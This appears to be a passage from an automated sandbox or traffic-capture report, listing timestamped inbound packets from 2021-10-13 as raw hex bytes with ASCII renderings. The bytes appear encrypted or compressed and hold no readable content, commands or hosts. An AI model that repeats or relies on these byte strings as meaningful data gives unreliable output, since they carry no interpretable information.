7c 32 d3 46 82 32 f5 ba 4f d1 35 Data Ascii: =g(S]?v$U7dM_k>*97k`2D;;X6DvdA_EX7{v8~_XIs?]<^z7PG:L],A~dT)\|r>e$6EhE>DFGv.Nl(l4PLS+Jf\X:Lzyj} gNWI=e/C\|2F2O5
2021-10-13 13:47:09 UTC	127	IN	Data Raw: 76 61 31 e7 ad 54 bd ee 9c 94 ec 04 99 f8 1d d2 4b 2e 11 23 e1 4b 84 cf 90 20 a8 4f d9 92 37 aa 0d e0 f0 86 6a 52 da d7 f4 d9 eb 0b b2 a6 9b b6 ad 88 c4 53 08 50 99 6c e4 7f e5 80 0a f6 0a 7b 45 89 b3 58 99 84 3e 5c bd c4 f1 e9 e6 6c 46 13 1b 6e 66 40 53 9e 78 d9 b7 8b a7 6b 7b 8f 43 cc fa cc f2 9a b5 d2 fc dc e8 23 36 6f 66 34 66 58 98 5b 7a 2a 44 77 dc 22 6f 05 7d 2a f9 72 5a 91 c8 af 83 dc 0f 9c 19 68 35 29 c0 a6 8f 08 e4 74 eb 46 65 a8 48 56 0c f7 4e 33 79 df 4a 29 1c 10 95 0e 16 68 2d 87 b0 68 24 a3 a0 14 19 7e b7 e8 3c 8c 97 2f a3 76 c3 b7 de ba 62 1f 5b 88 50 0a f3 e3 7d 76 6c 92 0a ea e0 53 6c 6d 6e a1 39 f8 3b 54 1c 0b b1 00 d5 b9 3a 8f f3 f1 30 85 7f 3d 58 e0 62 b8 d5 7d cf 05 24 45 01 f1 5e c7 34 ed 19 4b ca 39 a0 95 9e 92 15 62 6e b5 6e 0e d2 Data Ascii: va1TK.#K O7jRSPl{EX>\lFnf@Sxk{C#6of4fX[zDw"o}rZh5)tFeHVN3yJ)h-h$~</vb[P}vlSlmn9;T:0=Xb}$E^4K9bnn
2021-10-13 13:47:09 UTC	128	IN	Data Raw: 21 ff a3 71 69 ab c4 75 a2 36 c9 00 bd 4d fe 09 ae c6 9c df d1 76 84 72 e8 81 f4 f3 df b7 80 a7 9e 1e 2d 21 43 63 ce e7 f0 7c 5d 6d 38 f0 6d 80 85 52 26 87 96 39 7c 06 c9 de bd 09 0d 87 2a 8a 66 18 3e 9b 19 98 59 6d 4a 6b 91 44 4c 4b 78 39 de 8b 6d 44 5b 4f da 4a 01 ae 42 c1 22 06 4c 59 be 23 55 d0 46 ec b0 4f aa d9 f2 a5 4c a6 f7 da 4a 67 51 c8 e9 26 e1 4b bf ac b1 ab 04 56 86 e9 0d ac 21 19 2d 3a b0 89 48 27 89 68 32 7c dd ed 17 0f da d7 35 b0 d2 f9 6d 2d 84 2b b2 b5 05 5a b0 79 0c ce ec 2d 88 f5 7a 1b d5 21 df a5 78 eb fa 77 f2 8b 8b 4d 7b 48 7e 3e 4f fd 3b f3 92 4a 47 77 11 e6 26 05 49 54 fa bc 3e da 5b c7 6a 4e 6a c1 d2 2b 5a 08 f2 00 76 9c 53 d0 d6 c3 3c 6e e4 aa 95 77 c9 0c 10 c1 06 af ef 69 5c c9 67 b9 41 17 35 d4 67 0a 47 ea f3 7f 46 91 1a e5 36 Data Ascii: !qiu6Mvr-!Cc\|]m8mR&9\|*f>YmJkDLKx9mD[OJB"LY#UFOLJgQ&KV!-:H'h2\|5m-+Zy-z!xwM{H~>O;JGw&IT>[jNj+ZvS<nwi\gA5gGF6
2021-10-13 13:47:09 UTC	129	IN	Data Raw: 8e a1 3a 87 75 2e eb a0 e0 0c bc 66 e0 48 e8 4c 22 b7 b3 93 2e 2b c6 f6 f5 96 36 ae 7b 1f 48 06 f3 50 f6 ed 20 df a6 4e 4b 4f 86 b1 de b7 ab d9 49 df b6 78 26 82 b8 90 95 10 95 be 4d af 64 38 b7 11 19 45 14 69 99 41 57 21 74 80 69 84 b6 7f db 59 30 bf dc fc dc 3f d2 34 b1 f7 68 e4 f8 07 b8 e0 21 a0 ff fa 14 25 09 ff d5 ed 10 31 a3 52 46 fe 1c 40 99 16 68 68 47 d2 b3 13 06 48 54 0f 92 6d 30 da bf c4 a4 55 f3 3d a5 bf 13 35 93 40 0a ec 60 1d d2 9d a4 db 3f 33 f4 b9 ab d0 f8 0a ca 13 d7 65 3a 5e 6b c8 1c 20 80 f4 5f ce bb be c9 7e 7f 44 6a 1e 72 3a 56 28 32 f5 fd 25 1d 1e c0 41 8b 21 a1 80 83 07 3b 03 12 62 cc 64 fa 89 d3 5b 3e 7c c9 b6 72 83 ef ac d0 7c 84 18 b2 6a 52 0c 4c f4 c6 5f 69 7b 67 a8 68 58 58 27 73 6b 11 4b 92 6b ba 45 25 60 55 ed c5 48 34 dd d7 Data Ascii: :u.fHL".+6{HP NKOIx&Md8EiAW!tiY0?4h!%1RF@hhGHTm0U=5@`?3e:^k _~Djr:V(2%A!;bd[>\|r\|jRL_i{ghXX'skKkE%`UH4
2021-10-13 13:47:09 UTC	130	IN	Data Raw: 9a d2 90 d0 f4 77 20 84 a5 03 05 4c e5 d1 d3 c9 a1 80 52 28 04 fe 33 10 dd 29 89 4e 84 8c 20 a4 e0 23 d1 5e 12 3e 84 37 5c 4d 7e df 4f dd cd b9 12 8a 38 e0 a5 9b 5f 96 13 d7 b8 58 cc 95 72 46 c3 1b d8 c9 7b fc b5 21 73 cd a9 0d 48 aa 44 55 e9 e8 72 ec 06 b5 c6 3f b8 eb 77 43 da fa dd f4 fc 1b db 53 0c 54 24 32 d4 ee dc cb 5d b0 6d ae c2 e0 f9 62 35 50 19 f1 0f bd 31 fb 9d 51 a3 ee dc c5 33 6b cd d2 61 dc c7 1d 2b 02 57 ce 02 be 11 aa fa 0d 50 2c 02 3d bf 0c 52 4a 47 e7 f7 4c b4 17 0e 99 0d 84 03 d4 96 3b da 1e ff 24 b3 8d 61 42 60 9a 97 23 3e e3 73 76 a5 22 7b 43 27 c1 4e e5 5d 94 36 d5 ec 6d 1a d1 b7 2b 6f d7 f8 c2 d9 08 fd eb 86 fc 6f 51 d1 0b cd 33 0b 93 a5 94 60 ae 89 1e b4 12 a6 da 72 f5 fa db 1b 4b b4 c3 fe 9b af 39 24 24 8f 03 5c 2e cd 1b 1e ce 19 Data Ascii: w LR(3)N #^>7\M~O8_XrF{!sHDUr?wCST$2]mb5P1Q3ka+WP,=RJGL;$aB`#>sv"{C'N]6m+ooQ3`rK9$$\.
2021-10-13 13:47:09 UTC	131	IN	Data Raw: 09 33 c0 89 8c 1c cf 8a e7 55 68 f7 43 8c 5a c2 e4 31 95 14 08 dd 54 37 81 01 cc 1e fa ac bc 8c 82 92 79 b5 63 d6 b5 92 2f e5 4a 8b 48 75 40 8d 38 ca 1f 8d 0c 01 15 5a 86 eb 2e ed fd f4 ad 65 61 7c 86 1b cd f7 8e cf f9 f4 36 17 49 24 8f 9a 0d 44 10 07 e9 07 a3 aa ae f0 28 2a ac d6 a9 9e 6b e5 40 d9 66 e6 32 13 61 32 4d 9a 8a 1d dc 1b bc dd c1 f7 88 0e ea 41 fc ee 38 8a 76 b9 ac 21 ab 50 32 bf 73 a1 8a 8c 26 fc 00 f9 6b 06 bc ba ea d3 dc c8 3e 32 30 6c a8 cb d4 46 17 94 dd e9 a7 f2 59 6c 72 8e 7a 67 7b 29 93 66 2f 4a 38 26 e2 93 da d5 eb 70 64 d9 64 c8 8f fd 08 ce 60 57 ee 83 a3 fd 5c 2e f5 0c 21 ac cb 1a f6 d6 f9 d2 11 9a b2 21 d9 eb ea 17 7c ee ab 00 3e 43 41 52 b0 81 38 88 ff aa 00 8c 88 fa 93 ce 22 18 1c 5d d7 3e 00 d1 67 43 97 db 26 f0 31 bb c0 57 31 Data Ascii: 3UhCZ1T7yc/JHu@8Z.ea\|6I$D(*k@f2a2MA8v!P2s&k>20lFYlrzg{)f/J8&pdd`W\.!!\|>CAR8"]>gC&1W1
2021-10-13 13:47:09 UTC	132	IN	Data Raw: 39 8f 4d 16 7e ed a1 93 63 72 d9 6d 68 f4 ea c9 17 cd f8 29 22 3f fa a1 7e 93 bb 42 85 ae dd e7 b8 d1 48 7c d2 8f 6f 55 2f ee 88 2e ab 7c 85 3a 56 c8 1b bd dd a1 75 a9 44 e9 69 c9 41 ff 0d 38 82 77 1b 2f d0 a0 1d 05 65 d5 d3 7a c9 9c 2a a5 d6 6e c2 37 73 6b aa ea 59 e7 8b fa a8 df 04 d6 ee 81 e5 5c 99 8a 3e 54 e0 9c a4 89 74 8b c3 3a 9f 8a 1a 19 85 20 e8 70 d4 44 ee 19 41 75 9c 96 12 f4 fb 0d a6 3c 16 1e 9d a5 0c a8 76 30 f6 94 85 61 26 f9 5a 84 9e 4f 2d 7e 11 53 60 a1 1a a0 8d 93 8c 7a 2f 3e 1f 54 0a 1b 1a 30 3e 5a 30 bd f6 f8 8f 1e 6f 70 51 54 2f 6a 4c b0 02 99 b0 cc 22 52 09 cc bb 45 51 c7 35 ae 06 55 2f 3d 49 ae fe af 4e 97 f2 6c 16 08 5a 5b c7 38 17 c8 c5 66 ff c9 65 2e 67 d0 6c a1 2e 95 d8 1a 98 a5 0a f4 55 24 93 ad 3d 7d 3e 8a ce d6 58 06 78 ba a8 Data Ascii: 9M~crmh)"?~BH\|oU/.\|:VuDiA8w/ez*n7skY\>Tt: pDAu<v0a&ZO-~S`z/>T0>Z0opQT/jL"REQ5U/=INlZ[8fe.gl.U$=}>Xx
2021-10-13 13:47:09 UTC	134	IN	Data Raw: 32 4a fb a9 99 7f a4 06 e8 b8 23 66 4d f4 6f 68 65 ae 56 9f 9e 04 3d 86 07 08 d2 05 77 b4 71 30 8b 5b 31 20 b5 2a f9 61 b5 d6 c9 e9 1a 45 68 b2 ad d7 8e 73 cc 25 3c 03 90 dc c2 e0 46 76 ec 07 fe 1c 5d 38 af a8 f8 2c 81 75 75 91 8e f6 d7 12 83 03 6e c8 25 34 e4 16 c5 84 20 a9 92 4e cc 8d 97 4d 77 3c 98 94 4b e7 5c ac c7 0a ba a3 b6 b9 fd 20 e4 91 b5 3e bb 07 ad c9 2b b8 58 80 81 f2 f8 45 e2 c3 97 0a 1f a8 50 d7 e7 73 5b 51 61 5b 93 4f ef 97 2a e9 85 d2 6c f0 dc 2c 73 be 1f 8c ef 27 47 19 9f b5 d8 2b 57 b1 df a3 56 4b 02 a9 5f 5c f8 3d 7b 80 75 33 6c c8 9d 35 0a ed f6 93 21 3e 4d ac 44 20 97 69 09 af c0 35 84 9d 86 2b 5c 54 e6 cd e1 69 81 38 51 27 15 9c c4 fb 77 00 83 13 1a 1b 99 90 85 91 99 06 13 c1 22 36 6b 61 d5 2c 82 c7 b9 16 54 33 35 b9 30 ae 4b 01 fe Data Ascii: 2J#fMoheV=wq0[1 aEhs%<Fv]8,uun%4 NMw<K\ >+XEPs[Qa[Ol,s'G+WVK_\={u3l5!>MD i5+\Ti8Q'w"6ka,T350K
2021-10-13 13:47:09 UTC	135	IN	Data Raw: 0a 8c da 84 5e 4d 1a eb 24 5f b7 41 6d 17 f6 f2 cf cc 5a 48 5f 32 a7 66 f1 54 5b 3d a4 96 54 81 ad 4d 31 d5 b5 27 e6 77 a6 21 65 b8 f5 8e b1 b5 5f 9c 69 16 36 2f 95 59 52 1f cd e3 b9 c9 a7 19 86 fc 6a 97 5f 4f a3 ae 8d b6 d8 65 9f b9 28 bf 2f ab 02 73 e6 c7 df df ee bc 9c bf 09 4e cf f1 e7 ea c8 26 fa 7c 73 1e 86 1e 81 d3 9e e2 7b 25 91 c8 84 90 af 90 48 ac cd a8 00 84 66 93 6e 30 4e 6b dd e2 f7 af d4 25 b1 27 70 9b 9c 87 1c 7f 80 7c 16 3d b5 8c 0d aa fa b9 2c 65 3f c2 9b ac 7a 26 06 67 91 3e ee 5b 1d 58 4e dd 3a 2b 2e 21 63 6c 3a 62 f3 34 4f d0 da 28 63 dd 84 91 9e ad 7d 92 2f 3f 93 64 4b e4 45 ef f0 e4 41 b0 86 5d ad c0 62 3a 72 02 86 de a8 12 d4 71 55 ea bc c4 da cf ea 9d df d6 11 5a b5 16 ec 08 12 49 55 96 4b ae 5e 97 56 86 6e ba 6e 1c 5a 32 4a ad 3d Data Ascii: ^M$_AmZH_2fT[=TM1'w!e_i6/YRj_Oe(/sN&\|s{%Hfn0Nk%'p\|=,e?z&g>[XN:+.!cl:b4O(c}/?dKEA]b:rqUZIUK^VnnZ2J=
2021-10-13 13:47:09 UTC	136	IN	Data Raw: db 92 a5 8d 2f 16 b4 c1 0a 76 b7 e6 2c 3e 06 9f 13 59 b5 eb 31 2d c0 ed 96 64 f4 16 dc d0 fb 7d e2 22 3c 44 a8 be 2b 8e 49 08 14 aa 52 00 8f 4c 7a fa aa 62 e4 60 4e ad 37 7a 59 45 ad 78 df 31 06 2f 68 19 13 29 d1 6d b1 05 26 97 39 99 b6 a1 f2 0b d5 62 89 55 02 44 58 ec 05 db 10 2e f4 0a ea 69 17 0f 18 da e0 c2 a7 a3 49 40 6a 69 24 43 3e f7 ff e1 1a 46 89 2a 29 26 46 77 ea 6a bf 8f de 10 c7 61 e1 a5 ea 37 66 e5 0b 98 ac c5 a8 3a 04 be e4 b6 7c 23 ac dc 5c 36 18 ef 3c b5 ef 2f a0 13 38 6e c3 f1 ef 03 b1 4e 29 cb 8b 67 d0 66 48 a5 b6 a2 55 cd 79 0b da a3 96 d6 02 fe 29 29 13 b6 98 91 60 f7 16 b2 0e 28 cc 55 00 8e cf 7e 60 96 49 51 e5 de 48 7c 68 58 35 1d 3a 43 61 29 bb a0 87 56 3e 0c 57 8d 55 cc ee d5 82 d2 d9 88 c8 ec d9 99 a2 3a b2 74 cd 9c 24 a4 03 fb 40 Data Ascii: /v,>Y1-d}"<D+IRLzb`N7zYEx1/h)m&9bUDX.iI@ji$C>F*)&Fwja7f:\|#\6</8nN)gfHUy))`(U~`IQH\|hX5:Ca)V>WU:t$@
2021-10-13 13:47:09 UTC	137	IN	Data Raw: f6 6d 1e dd bf 3e b8 cc f7 10 c2 69 db a1 f1 32 39 8d 51 ed 0c da ac 61 8b 87 83 bd c5 9d 6d a8 dd 54 0f f9 f6 8d 74 10 7b f3 5f bc be 36 a1 b3 ae 23 04 eb ce 1c c7 10 84 05 8c 89 2f a2 78 86 82 cf 21 93 64 a6 a6 54 e6 5e 18 10 31 8b 65 97 10 0b fb 98 9a e4 41 b9 0a 2b da fd b8 94 0e 99 b9 48 1d ac 75 31 2c 5d cf d1 60 a7 d0 23 32 a7 37 49 9f e0 23 87 32 a4 a4 53 93 a4 02 6b ec 74 59 52 d1 a0 87 92 2a 6e 19 81 7e 3f 98 49 9f 59 27 70 fc 1a 7a a6 d3 9d 1d 4f 48 10 c1 ae 56 90 ea 51 4b 0a 8c ca 34 75 0c 1a 09 05 28 5c 17 89 91 dc 74 c0 64 e8 ac 04 03 ea 10 20 ec 82 45 6a 2d fc 19 ea b1 fe 5a 28 eb e6 7a 04 fe 87 ef ee bb bc 0c 72 b4 1c 73 25 18 39 79 23 d3 88 3c 65 f2 c0 f7 b5 a7 bb 30 48 68 9a ad 28 6a 25 41 a3 02 8d 79 d9 38 6d 2c d4 fe a4 e2 6f 19 0d ef Data Ascii: m>i29QamTt{_6#/x!dT^1eA+Hu1,]`#27I#2SktYR*n~?IY'pzOHVQK4u(\td Ej-Z(zrs%9y#<e0Hh(j%Ay8m,o
2021-10-13 13:47:09 UTC	139	IN	Data Raw: e8 4f b9 7b b9 8d 97 21 4e d1 ac e2 02 ab 42 53 ca 44 d6 5b 34 99 e5 a8 7d 0d 6a 85 e6 46 28 05 e6 fc 71 fd 93 fe 7a 39 ec b5 36 9c 65 95 27 57 05 ce 1b f7 ea 0d c5 65 a7 9e df 45 20 01 f4 64 63 bf c7 ec 39 22 5e 0e a1 ed 2e 70 68 b8 50 22 2e 5a 84 35 38 7c ae 9e 35 b5 b4 19 dc 4e d8 97 c1 cf 72 2f dd 2d 5c 6a 66 0d 8e 9d 92 36 a0 24 b0 a3 f0 12 ce f9 f3 af 95 a0 92 34 30 97 8b bd f0 4d 57 b9 d7 b2 38 78 80 a4 4b 7c c9 91 09 af 53 74 7d d4 ec 53 bd f0 9f ec 40 6b 4f 2b 8d 97 62 87 83 a9 ae ea 5b 86 10 ca 71 c9 be ab 6f 45 d7 85 ff 60 aa 0b 7c bc 76 39 1f d5 e3 94 19 15 79 f1 55 99 1c b0 3c 05 6f 99 04 f2 f1 fe f3 0c 86 7b 33 c1 57 a3 ec 82 ee 99 eb c1 c9 00 f5 e8 bd c5 1a d5 8d 10 83 53 00 d1 55 20 d7 5b bc 0a 45 73 dd bd 19 c9 7b 47 cf ab 31 c1 74 e5 25 Data Ascii: O{!NBSD[4}jF(qz96e'WeE dc9"^.phP".Z58\|5Nr/-\jf6$40MW8xK\|St}S@kO+b[qoE`\|v9yU<o{3WSU [Es{G1t%
2021-10-13 13:47:09 UTC	140	IN	Data Raw: c0 7f f9 4b ee 6f 19 b3 54 cd 0a 7e 8a af 04 9d 71 87 df ca 60 19 d7 ba ab 96 cc 1d 83 cf eb 58 7d 02 aa 91 24 af 9c 93 4e 8d 3e e0 49 97 65 f5 a4 73 50 ed b0 b5 11 16 43 0a ab a5 39 e1 a7 5e 2c fd fc 9c d2 c5 04 78 78 3e 75 da 8a 92 b2 be 77 00 63 e9 26 d1 1a 93 38 a3 c3 6c 3a cb f7 6f f6 26 25 55 4c 67 ef 96 11 6d da 98 71 09 c1 fd 71 00 ca b1 c1 95 76 af ab ec 96 62 09 d8 25 9a e6 7f d4 cc 6c a9 db b7 e8 fc 1b 2f 7d d5 0f 2f 32 93 8d 2e c6 b4 45 83 4e 3a b5 6d 09 ee 31 91 73 39 9a 51 2d a0 f3 2b 49 db d5 27 c1 b8 65 28 4a 58 ca 48 e1 1c b8 e1 2c b6 3a 68 9d 7a 61 ea 1b 72 a5 70 8e cd 3d 15 b7 10 09 e9 67 84 c5 57 8e 93 10 64 f5 b0 2b 86 c3 01 08 ea b8 9c d9 d2 85 d5 60 b1 82 8a 34 9d 5f e3 fa 7c b9 14 86 73 ee d8 45 1e b9 bc be 98 8a 5f 9b be 51 7c 16 Data Ascii: KoT~q`X}$N>IesPC9^,xx>uwc&8l:o&%ULgmqqvb%l/}/2.EN:m1s9Q-+I'e(JXH,:hzarp=gWd+`4_\|sE_Q\|
2021-10-13 13:47:09 UTC	141	IN	Data Raw: fe b7 f6 81 fa bf 93 8f ca 9d ff 9b ca 96 ab d6 64 a3 74 c4 3e 1f 61 e1 ea 55 8d 09 37 83 4e f2 8b 44 9a ea ed cd 7c 88 e8 4f 09 a3 19 16 4a f7 79 90 88 ed c1 2c 5f b5 04 f2 87 39 02 f4 60 d7 30 f8 e6 f5 60 9d 92 9d e8 2d d8 a1 a1 52 41 20 14 6f 32 1f 3e 52 b3 84 27 b9 54 3d 40 9a 51 c1 10 53 eb 6f 5b 28 8c e7 46 b2 c6 1d 14 db c2 5e c4 36 f6 87 32 aa 8d 28 6e 86 a2 50 23 e5 9d ff c8 4b 38 7d 76 27 7d 30 a0 f8 2a a1 01 12 9a 78 96 ed 4a 07 bf 05 05 fb de 7d f5 0c 3f cb 2b 91 ea 65 fc 4c d2 03 6a 42 00 30 42 79 8e b0 06 4c 78 30 df 4f d1 54 83 9f f3 31 1d 82 c0 d0 7a 5e db f8 77 3c 3a 9f bd 91 89 73 9c cc ed fb a4 74 8f b0 8d 9d 8c 4c 48 55 31 7b 34 fe a7 b7 0c cc c5 71 56 a0 7b 67 32 67 e6 34 97 4a f6 4a 35 c6 dd 58 a4 ab 71 72 13 d2 7c 27 24 9d bd 50 87 Data Ascii: dt>aU7ND\|OJy,_9`0`-RA o2>R'T=@QSo[(F^62(nP#K8}v'}0*xJ}?+eLjB0ByLx0OT1z^w<:stLHU1{4qV{g2g4JJ5Xqr\|'$P
2021-10-13 13:47:09 UTC	143	IN	Data Raw: 57 64 ec fc f3 0b b4 e2 80 f4 64 82 0b 15 03 19 71 ed d3 4c d4 00 a5 37 9c 3f c6 32 10 16 3d dc 1e 3d 52 68 81 bb 32 91 e6 bd d4 5d cb 8d 16 60 31 77 29 67 9b 68 d7 a9 fc a1 36 6b 44 a7 0d f3 72 d9 47 43 1e 68 f1 62 d9 65 4a 3b 94 97 68 ec 4d 3d 3a db 0d fe 0c a2 96 00 5d 71 7e 27 14 4f 17 9b d3 3e 90 39 f7 db db 73 2b 37 90 41 57 1c dc 7e 87 4f 96 14 87 49 38 43 6a c5 d4 7c e5 fe 1f 49 04 2f 4c 1d 62 6d a2 90 55 28 bc a8 0d 78 fc 8a b5 c6 a4 a7 dd 59 ac 82 3e fc 90 79 b9 0f fd 7d fa e7 a6 44 d3 98 ae 6d e9 c5 5f 77 7b 97 34 9d 49 65 70 01 db c8 8c ba 95 b9 ee 99 ac c0 3f f5 67 60 08 6c ee e3 d1 99 c3 ad 74 12 b2 5e 33 94 5d 4c 42 40 f2 9a f7 3d b0 fb 09 ef f9 37 98 48 84 13 c8 5f fa d8 88 50 36 62 bc c8 5b 45 9f bd 74 8c 0c 3e 3a 90 37 ca 96 2f 2c 6a 02 Data Ascii: WddqL7?2==Rh2]`1w)gh6kDrGChbeJ;hM=:]q~'O>9s+7AW~OI8Cj\|I/LbmU(xY>y}Dm_w{4Iep?g`lt^3]LB@=7H_P6b[Et>:7/,j
2021-10-13 13:47:09 UTC	144	IN	Data Raw: 99 08 25 b3 57 b9 50 a6 88 ef 39 0c 68 35 20 18 14 7b 3d cd 9c 3b 8d c0 18 90 f3 52 32 a1 13 0c 52 93 61 0f d9 b4 c3 fb 1d ae 8b a9 1d e2 15 62 e5 c8 fa d6 e8 30 04 c4 b5 89 d0 4a a9 62 60 4a bc 98 e8 95 b2 36 90 6d 3a f2 60 92 c2 0e 59 4e 1d 99 81 63 33 f7 a6 72 1a 90 56 50 24 62 ac 29 a7 c5 9b b5 b9 76 43 59 2c f5 54 71 55 33 41 42 09 99 48 f3 ff 81 09 4c e0 e2 a5 88 30 0f 1a 7a b0 df fd 80 b6 de 02 0f 87 19 fd 6c 0e 30 49 05 92 21 07 ef 2e ff 56 7a 9d 74 db c6 c7 c1 f7 45 6c 53 75 75 63 33 a7 74 31 0f 00 18 ca cc 4d 4c e5 1b 88 b1 77 09 e2 e5 4f 6a d2 e3 24 bf 41 4c 52 05 a5 3c 49 76 8c 47 13 4f 0f b7 2c 86 1f eb e6 f4 9c 99 e9 4a 97 6c 98 fe d2 e5 17 3d 6b c6 a1 15 f5 a2 14 ee 6c f1 ea 72 fa 07 1c 05 96 97 8b 89 fa 22 03 0c 36 03 9b 7a 92 c5 70 2d 9b Data Ascii: %WP9h5 {=;R2Rab0Jb`J6m:`YNc3rVP$b)vCY,TqU3ABHL0zl0I!.VztElSuuc3t1MLwOj$ALR<IvGO,Jl=klr"6zp-
2021-10-13 13:47:09 UTC	145	IN	Data Raw: 07 00 d3 03 f4 a8 28 94 ea c3 ae 57 42 f0 d4 d1 f0 11 b5 12 72 52 33 3f 3d 67 03 fc 29 0b ec 66 b7 12 55 e5 3c 57 96 4b 54 4e e2 e1 11 dd a9 79 ac eb 61 e9 23 ee ad dd 4a 33 fc f8 56 9e ea 4c c3 e7 2a f2 c0 e9 a6 ef 5d 09 84 da b7 1c 1d 95 9e 7d f6 e1 92 bc 60 ad 5c fd 7f 1e 86 6b 16 36 95 32 5c 0a 3e 59 53 2f 34 35 b5 24 f6 98 cc 13 28 81 1b 2a 6a 1f ed f0 08 67 ce e6 93 c1 f6 ce a6 5d 1c 62 9d f8 25 83 54 d5 d6 f3 99 8e e7 31 38 0c 5e 73 b1 4c f1 de 55 91 dc 71 12 d4 0a c4 bf 1f 12 6b 07 a6 4c bc e5 47 9f d4 e8 b7 b3 07 a1 7a 40 17 35 f8 27 f6 8c 69 a3 2b 71 23 f4 79 f6 d0 09 7d c8 f0 d1 5c 15 c7 2e f1 71 03 df e3 59 d2 a1 bf c0 ab 1d 20 ca dd a6 2c ab e9 ad 35 dd 2f af 00 fc 8c 26 58 71 cd da 64 c8 7c 8c 52 df 37 31 99 2e ab 7f a4 25 e1 6f 14 dc 95 33 Data Ascii: (WBrR3?=g)fU<WKTNya#J3VL]}`\k62\>YS/45$(jg]b%T18^sLUqkLGz@5'i+q#y}\.qY ,5/&Xqd\|R71.%o3
2021-10-13 13:47:09 UTC	146	IN	Data Raw: a9 8c 50 9f bd a3 ba 3b 85 fd 77 6d d5 53 8b 5a 7c 5e 7f 5f 16 b0 df c6 93 f5 ad 7b bc c2 ff 4a 8b 46 8f 98 cc 5c 6c 7a 49 f3 f5 4f 09 ed d1 ec a6 8d 03 0b 95 f9 0d 7b 22 d4 c6 f8 f1 5c 66 f1 da 24 20 3b f6 bf 7c 13 51 93 f7 60 a6 15 44 2d cb 66 ee c9 be bd 8a d8 06 94 94 4a 20 69 a8 af b3 d9 47 60 24 9c 95 e6 1b d6 37 14 cf c1 44 09 29 04 9e d7 dd 0a b4 94 33 79 1b 48 d5 0b ed 95 29 87 73 62 7a 01 5f 10 1f 2f b5 d2 a9 7c 96 67 e6 85 f1 ae c0 29 b3 b1 67 d7 57 35 91 28 3d e3 76 d3 b9 56 9e 75 94 8e 8f 1b b2 b7 0b a4 e2 5a 15 c9 df 40 cb c2 d2 8e 99 88 cc d8 71 3b 9a 31 da 52 e5 ec b3 32 6d d2 91 bf 86 7a d6 d7 be 29 df 5f d3 a0 fa 8e 52 88 56 d4 5b b9 f3 16 d2 af f5 01 91 e4 90 85 63 14 1a 68 ea 5a 16 0f 78 3a ba 30 67 f5 b6 d2 d8 db 09 a5 45 d2 7e 51 09 Data Ascii: P;wmSZ\|^_{JF\lzIO{"\f$ ;\|Q`D-fJ iG`$7D)3yH)sbz_/\|g)gW5(=vVuZ@q;1R2mz)_RV[chZx:0gE~Q
2021-10-13 13:47:09 UTC	147	IN	Data Raw: fe be a3 f9 ad 6c 51 86 ac 99 2e 68 ad 0a 38 59 81 8a 72 30 1f 99 85 db 38 c1 28 2f ef a4 2d d7 88 ba 5a f3 48 f8 5e aa 67 92 9c 72 3b 2d a4 49 ce 57 5a a1 a9 33 26 f5 b4 4d 27 a9 f2 1b 52 9b 29 c0 29 b5 7f bf 92 91 cb db 4e f5 20 50 c9 48 f7 fc d8 f1 3c 6e 5f 05 83 27 c8 01 5e 84 db a4 43 ed b9 23 3f df 6d 07 99 6d 85 b4 6b 62 aa 64 bd 98 d6 79 dd 78 88 70 37 17 4d 32 7f 49 32 8d 3b 1c f6 09 a2 03 fd b9 d8 00 ee 4f f1 12 3e f7 89 2f 0b c0 00 b3 7f c8 53 18 e9 ab 91 7b 6d ab 40 9b f0 87 4b 18 ad b5 bd 89 55 bb 95 4b 5f 4f 5e 0f 3e a8 6b de 26 93 d9 d3 c5 12 68 fc 00 80 a4 06 c2 7e 06 36 87 99 11 ee 26 1e 1d b7 58 62 2e aa be 74 77 bb 7a b6 7d 11 b8 54 da d0 af 75 6c 73 5c 21 34 cb f2 81 44 90 b8 b3 d2 ec f4 8c b5 14 52 b3 49 04 d7 bf 42 fb 09 46 d3 64 4c Data Ascii: lQ.h8Yr08(/-ZH^gr;-IWZ3&M'R))N PH<n_'^C#?mmkbdyxp7M2I2;O>/S{m@KUK_O^>k&h~6&Xb.twz}Tuls\!4DRIBFdL
2021-10-13 13:47:09 UTC	148	IN	Data Raw: b2 07 2f 84 70 1c 37 9f 2c 58 e1 f2 80 84 be 02 45 fa d0 0c 0a f4 54 56 11 61 6b 26 65 61 e1 18 01 86 d8 10 cb d5 e9 b8 db 62 5a 2b e3 75 b7 8a 04 fa 50 98 26 a5 a6 90 ff 87 ca 9a f0 99 6e ae 44 3f fd aa 0e 6c 52 c4 fc 49 67 a5 bd 4f 50 3b b3 79 f3 79 c9 12 7d f5 f8 c9 e1 c3 92 2b 01 97 17 58 a9 c2 b3 46 15 eb 66 e6 3c 43 27 5f b7 a6 94 1f e1 9c c7 99 97 f5 c9 cf 65 e5 d1 90 8a 67 3d 61 b8 63 bc 07 7f aa e3 f7 fe 43 5c 31 6a 40 35 1f 2d 64 bc 52 69 09 20 be fd dd a9 38 f9 63 d2 3d 38 e2 db 2b 20 ce 23 d2 d2 36 f3 26 8f a3 60 9d 08 95 49 d6 50 40 94 a5 9a c8 28 e3 79 20 b9 14 bc e7 a4 d8 19 64 2a 12 3f 91 93 50 a4 1e 5f ad 88 cf 84 af 75 51 93 77 63 d2 9b 0d ba 06 31 70 56 18 a6 92 f5 75 80 64 ca d3 ab 0f 1d b3 93 58 c4 45 9e db 54 00 21 8c 8e 78 1d 18 09 Data Ascii: /p7,XETVak&eabZ+uP&nD?lRIgOP;yy}+XFf<C'_eg=acC\1j@5-dRi 8c=8+ #6&`IP@(y d*?P_uQwc1pVudXET!x
2021-10-13 13:47:09 UTC	150	IN	Data Raw: e9 84 29 ac c0 73 df 44 57 47 d7 65 b5 eb a2 5c f9 c9 65 20 88 6c b0 f9 bb 00 9a e8 98 20 dd 4c 31 58 63 56 46 ae 1f 95 27 f2 e1 68 95 61 81 88 a6 cc a3 fc b2 a6 d7 53 20 d4 2d e6 f4 bb 6e 84 be 4f d3 8a 34 da 0a e5 a5 d6 e1 c6 8f cd a2 c2 3a 60 07 28 b9 cb 72 2b 0d 42 10 21 32 c4 a3 72 0a ab a8 f7 83 09 13 66 c8 9b df 6a d6 49 fd c4 01 ed 8f 7e a1 6c 18 54 56 0d b0 8e eb df 55 57 09 5c bd 07 19 c5 50 8d a7 8f 7f 41 16 04 88 72 a4 81 2f 58 57 34 c1 46 0c 94 09 92 6e 04 66 69 05 b2 52 5c ac 65 38 62 6e 5a 7d ce 74 0a 33 13 42 26 c4 53 1b a6 e9 1b df 5c a4 0d 47 26 62 cb 6d 6d f1 0b bf 75 3d aa 69 37 08 65 6d f4 00 8b f0 88 ad 3f 43 3d 95 96 b0 34 2d 16 08 64 03 1f 